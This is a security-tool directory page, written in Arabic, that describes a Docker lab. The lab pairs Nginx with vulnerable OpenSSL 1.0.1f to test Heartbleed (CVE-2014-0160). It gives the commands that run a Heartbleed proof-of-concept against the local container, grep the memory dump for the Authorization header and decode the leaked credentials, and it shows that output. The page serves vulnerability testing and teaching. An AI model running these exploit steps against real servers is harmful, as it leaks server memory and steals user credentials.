Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Heartbleed_Dockerfile_with_Nginx — Dockerfile لاختبار استغلال ثغرة Heartbleed (CVE-2014-0160). | Kitploit
أدوات/GitHubGitHub/froyo75/heartbleed_dockerfile_with_nginx
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubfroyo75/heartbleed_dockerfile_with_nginx

Heartbleed_Dockerfile_with_Nginx

Dockerfile لاختبار استغلال ثغرة Heartbleed (CVE-2014-0160).

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

اختبار Heartbleed باستخدام Nginx Dockerfile

يحتوي هذا المستودع على Dockerfile الخاص بـ Nginx مع إصدار OpenSSL الضعيف (1.0.1f) لاختبار ثغرة CVE-2014-0160 Heartbleed.

صورة Docker الأساسية

  • debian:latest

التثبيت

  1. ثبّت Docker

    • مثال باستخدام Debian: apt-get install -y docker
  2. نزّل صورة debian الأساسية من Docker Hub Registry العام: docker pull debian:latest

  3. ابنِ الصورة من Dockerfile: docker build -t heartbleed_nginx_img .

الاستخدام

تشغيل حاوية Heartbleed+Nginx

docker run -i -t -p 1500:443 heartbleed_nginx_img

اختبار ثغرة Heartbleed (CVE-2014-0160) عبر طريقة HTTP Basic Authentication
  1. نزّل نص Heartbleed-poc بلغة Python (لأغراض الاختبار فقط!). هذه نسخة معدلة أصلها من Jared Stafford [email protected]. شكرًا لـ SensePost على هذه النسخة.

  2. افتح تبويبين جديدين في الطرفية الحالية وشغّل:

    • التبويب الأول (توليد x100 طلب GET باستخدام HTTP Basic Auth مع أمر curl):

      for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done

      HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK snipp...

    • التبويب الثاني (توليد x100 طلب Heartbeat (-n 100) وكتابة تفريغ الذاكرة إلى ملف "dump.bin"، ثم استخراج النتيجة من حقل "Authorization" من تفريغ الذاكرة وأخيرًا فك ترميز سلسلة Base64 الناتجة إلى نص عادي ^^):

      python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo

      WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! snipp... admin:myP@ssword0MG

تنزيل الأداة